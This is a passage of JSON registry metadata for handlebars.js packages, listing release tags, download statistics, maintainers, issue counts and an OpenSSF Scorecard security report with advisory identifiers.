ame":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2024-10-29T23:16:04.818Z","dependent_packages_count":20,"downloads":2795116,"downloads_period":"total","dependent_repos_count":2623,"rankings":{"downloads":1.950535584095115,"dependent_repos_count":0.6259359593478151,"dependent_packages_count":1.05659276873293,"stargazers_count":0.05271717794851663,"forks_count":0.1323663856685344,"docker_downloads_count":2.5623913409231114,"average":1.0634232027860038},"purl":"pkg:gem/handlebars-source","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/rubygems/handlebars-source","docker_dependents_count":3,"docker_downloads_count":713,"usage_url":"https://repos.ecosyste.ms/usage/rubygems/handlebars-source","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/rubygems/handlebars-source/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T19:05:59.510Z","issues_count":148,"pull_requests_count":96,"avg_time_to_close_issue":23271243.37142857,"avg_time_to_close_pull_request":15945824.09375,"issues_closed_count":105,"pull_requests_closed_count":64,"pull_request_authors_count":33,"issue_authors_count":117,"avg_comments_per_issue":3.493243243243243,"avg_comments_per_pull_request":1.78125,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":18,"past_year_pull_requests_count":9,"past_year_avg_time_to_close_issue":95338.875,"past_year_avg_time_to_close_pull_request":4026891.5,"past_year_issues_closed_count":8,"past_year_pull_requests_closed_count":4,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":16,"past_year_avg_comments_per_issue":1.6666666666666667,"past_year_avg_comments_per_pull_request":2.6666666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages/handlebars-source/codemeta","maintainers":[{"uuid":"1522","login":"wycats","name":null,"email":null,"url":null,"packages_count":81,"html_url":"https://rubygems.org/profiles/wycats","role":null,"created_at":"2022-11-09T09:34:42.578Z","updated_at":"2022-11-09T09:34:42.578Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/wycats/packages"},{"uuid":"3176","login":null,"name":null,"email":null,"url":null,"packages_count":16,"html_url":"https://rubygems.org/profiles/","role":null,"created_at":"2022-11-09T09:34:42.604Z","updated_at":"2022-11-09T09:34:42.604Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/3176/packages"},{"uuid":"43479","login":"rwjblue","name":null,"email":null,"url":null,"packages_count":10,"html_url":"https://rubygems.org/profiles/rwjblue","role":null,"created_at":"2022-11-09T09:34:42.626Z","updated_at":"2022-11-09T09:34:42.626Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/rwjblue/packages"},{"uuid":"55440","login":"machty","name":null,"email":null,"url":null,"packages_count":15,"html_url":"https://rubygems.org/profiles/machty","role":null,"created_at":"2022-11-09T09:34:42.563Z","updated_at":"2022-11-09T09:34:42.563Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/machty/packages"},{"uuid":"73375","login":"kpdecker","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://rubygems.org/profiles/kpdecker","role":null,"created_at":"2022-11-09T09:34:42.638Z","updated_at":"2022-11-09T09:34:42.638Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/kpdecker/packages"},{"uuid":"107178","login":"lawnsea","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://rubygems.org/profiles/lawnsea","role":null,"created_at":"2022-11-09T09:34:42.685Z","updated_at":"2022-11-09T09:34:42.685Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/lawnsea/packages"},{"uuid":"108720","login":"nknapp","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://rubygems.org/profiles/nknapp","role":null,"created_at":"2022-11-09T09:34:42.719Z","updated_at":"2022-11-09T09:34:42.719Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/nknapp/packages"},{"uuid":"105882","login":"ErisDS","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://rubygems.org/profiles/ErisDS","role":null,"created_at":"2022-11-09T09:34:42.747Z","updated_at":"2022-11-09T09:34:42.747Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/ErisDS/packages"},{"uuid":"180410","login":"jaylinski","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://rubygems.org/profiles/jaylinski","role":null,"created_at":"2023-08-04T01:21:00.883Z","updated_at":"2023-08-04T01:21:00.883Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers/jaylinski/packages"}],"registry":{"name":"rubygems.org","url":"https://rubygems.org","ecosystem":"rubygems","default":true,"packages_count":209889,"maintainers_count":69247,"namespaces_count":0,"keywords_count":18771,"github":"rubygems","metadata":{"funded_packages_count":7455},"icon_url":"https://github.com/rubygems.png","created_at":"2022-04-04T15:19:23.446Z","updated_at":"2026-06-10T05:04:00.514Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/rubygems.org/namespaces"}},{"id":5001089,"name":"org.webjars.npm:handlebars","ecosystem":"maven","description":"WebJar for handlebars","homepage":"https://www.webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":[],"namespace":"org.webjars.npm","versions_count":24,"first_release_published_at":"2018-02-04T14:55:34.000Z","latest_release_published_at":"2026-04-08T12:11:09.000Z","latest_release_number":"4.7.9","last_synced_at":"2026-07-22T11:52:07.195Z","created_at":"2022-07-27T10:59:28.197Z","updated_at":"2026-07-22T11:52:07.195Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.npm/handlebars/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.npm/handlebars/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2025-08-19T20:53:19.000Z","size":4055,"stargazers_count":18474,"open_issues_count":111,"forks_count":2056,"subscribers_count":436,"default_branch":"master","last_synced_at":"2025-10-26T13:58:41.392Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2025-10-25T20:27:46.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: 